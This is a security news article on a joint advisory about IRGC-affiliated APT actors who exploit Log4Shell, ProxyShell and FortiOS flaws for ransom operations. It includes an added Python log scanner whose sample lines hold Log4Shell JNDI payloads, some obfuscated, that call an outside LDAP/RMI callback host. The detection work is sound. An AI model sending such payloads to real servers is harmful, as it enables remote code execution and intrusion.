September 16, 2022

Iran-backed APT actors utilize CVEs to carry out cyber attacks on critical infrastructure

By Carolynn van Arsdale, Writer, ReversingLabs

An advisory co-authored by cybersecurity agencies in the U.S., U.K., Canada and Australia warns that an Iran-backed APT group is exploiting known, already-patched vulnerabilities to carry out attacks.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published the new Joint Cybersecurity Advisory this week, co-authored with the National Security Agency (NSA), the Department of Justice (through the FBI), U.S. Cyber Command and the Department of the Treasury. The advisory was also written in collaboration with the Australian, Canadian and British cybersecurity agencies.

In the advisory, the co-authors warn of APT actors based in Iran that are affiliated with the state's Islamic Revolutionary Guard Corps (IRGC). Since early 2021 these actors have been exploiting publicly known vulnerabilities, tracked as CVEs, such as the Log4j flaw known as Log4Shell (CVE-2021-44228), to carry out malicious cyber activity.

Here's what your security team needs to know.

An APT evolves

This new advisory builds on a November 2021 advisory warning that the same APT actors were exploiting Fortinet FortiOS vulnerabilities and the ProxyShell vulnerabilities in Microsoft Exchange Server. One of the major developments in the new advisory is the co-authors' firm assessment that these actors are affiliated with the IRGC. The earlier advisory had described them more generally as Iranian government-sponsored; the new attribution ties a group that behaves like a ransomware crew to a specific arm of the Iranian state, attacking entities on its behalf.

Another development cited in the advisory is increased knowledge of the group's attack methods. It was previously known that these actors exploited Fortinet FortiOS and Microsoft Exchange Server vulnerabilities to "gain initial access to a broad range of targeted entities in furtherance of malicious activities," according to the advisory. The group's use of the ProxyShell vulnerability chain in Exchange was likewise already on the government's radar.

Log4j added to the mix

Now, the co-authors assert that, in addition to those earlier vulnerabilities, the infamous Log4j vulnerability (Log4Shell, CVE-2021-44228, in the Apache Log4j 2 logging library) has been added to the group's initial-access toolbox.

The co-authors believe the group exploits all of these vulnerabilities for the same purpose: initial access to a target environment. Once inside, the actors choose a course of action based on how they perceive the target's environment and data. Often they use that access for disk encryption and data extortion in support of ransom operations.
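The initial-access vector the advisory adds here, Log4Shell, leaves a recognisable trace in the logs of any internet-facing service that forwards request data to a vulnerable Log4j 2 instance: a `${jndi:...}` lookup in a request field, frequently hidden behind nested lookups (`${lower:j}`, `${::-j}`) or percent-encoding. The scanner below is an added example, not code from the advisory or from ReversingLabs. It resolves the obfuscation layers before matching, so that a literal search for `jndi` is not all it relies on. The Apache-style log lines it runs over are constructed for illustration, and the addresses in them are documentation ranges, not real hosts.

```python
"""Scan web-access logs for Log4Shell (CVE-2021-44228) exploitation attempts.

Added example, not code from the advisory or from ReversingLabs. The log lines
in SAMPLE_LOG are constructed, not captured from a real incident.
"""
import re
import urllib.parse

# Innermost Log4j 2 lookups that attackers use to hide the literal "jndi":
#   ${lower:J} -> j    ${upper:n} -> N    ${::-j} -> j    ${env:NOPE:-j} -> j
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Once de-obfuscated, any JNDI lookup is the indicator; capture the callback.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/}\s]+)", re.IGNORECASE)
_CLIENT_IP = re.compile(r"^(\S+)")  # first field of a combined-format line


def url_decode(text: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of percent-encoding (payloads are often double-encoded)."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def deobfuscate(text: str, max_passes: int = 20) -> str:
    """Resolve nested lookups innermost-first until the string stops changing.

    Only innermost lookups match (their bodies exclude '$', '{' and '}'), so
    each pass peels one layer; max_passes bounds pathological input.
    """
    for _ in range(max_passes):
        resolved = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(line: str):
    """Return (protocol, callback) if the line carries a JNDI lookup, else None."""
    match = _JNDI.search(deobfuscate(url_decode(line)))
    if match is None:
        return None
    return match.group(1).lower(), match.group(2)


def scan_log(lines):
    """Return one finding per line that contains a Log4Shell attempt."""
    findings = []
    for line in lines:
        hit = find_jndi(line)
        if hit is None:
            continue
        client = _CLIENT_IP.match(line)
        findings.append({
            "client": client.group(1) if client else "?",
            "protocol": hit[0],
            "callback": hit[1],
        })
    return findings


# Constructed Apache combined-format lines (documentation IP ranges, not real hosts).
SAMPLE_LOG = [
    # 1: plain payload in the User-Agent header
    '203.0.113.10 - - [12/Feb/2022:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    # 2: case-lookup obfuscation in a query parameter
    '203.0.113.10 - - [12/Feb/2022:03:14:09 +0000] '
    '"GET /login?user=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # 3: percent-encoded payload in the path, RMI instead of LDAP
    '203.0.113.10 - - [12/Feb/2022:03:14:11 +0000] '
    '"GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    # 4: default-value lookups hiding every letter of "jndi"
    '203.0.113.11 - - [12/Feb/2022:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://198.51.100.7:1389/d}"',
    # 5: benign request
    '198.51.100.200 - - [12/Feb/2022:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['client']} -> {finding['protocol']}://{finding['callback']}")
```

The callback host and port are the most useful fields in the finding: a request that carries a JNDI lookup only proves an attempt, while an outbound LDAP or RMI connection from the application server to that callback, visible in firewall or proxy logs, shows the lookup was actually resolved. Note also that only the fields the web server writes to its access log can be scanned this way; a payload in a header the server does not log still reaches the application, so the application's own logs need the same treatment.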

In that respect the group operates much like a ransomware crew. It will either sell a target's data, or use double extortion, both stealing and encrypting the data, and then pressure the target to pay a ransom to have its data decrypted and kept private. Notably, the advisory cites several instances in which, after moving laterally through a target's network, the group encrypted data using BitLocker, the disk encryption feature built into Windows, a legitimate tool turned against its owner rather than a custom payload that endpoint defenses might flag.

The target: Critical infrastructure

The joint advisory's co-authors believe the group has targeted a broad range of victims, including critical infrastructure entities based in the U.S., U.K., Canada and Australia. The advisory notes, however, that the actors are opportunistic: they exploit vulnerabilities on "unprotected networks" rather than singling out specific entities or sectors.

Four attacks carried out by the group are listed in the new advisory. Two occurred in December 2021 and used the ProxyShell vulnerabilities in Microsoft Exchange Server to compromise a U.S. police department and a U.S. transportation company. The other two, in February 2022, exploited the Log4j vulnerability to gain access to a U.S. municipal government and a U.S. aerospace company.

Beyond its IRGC backing, the group's motivations are not discussed in the new advisory. What is known is that the actors operate under the cover of technology companies based in Karaj and Yazd, two Iranian cities.

The co-authors urge organizations, and "especially critical infrastructure organizations," to apply the mitigations listed in the joint advisory to reduce the risk of compromise by this group.

Tags: News, Advanced Persistent Threats
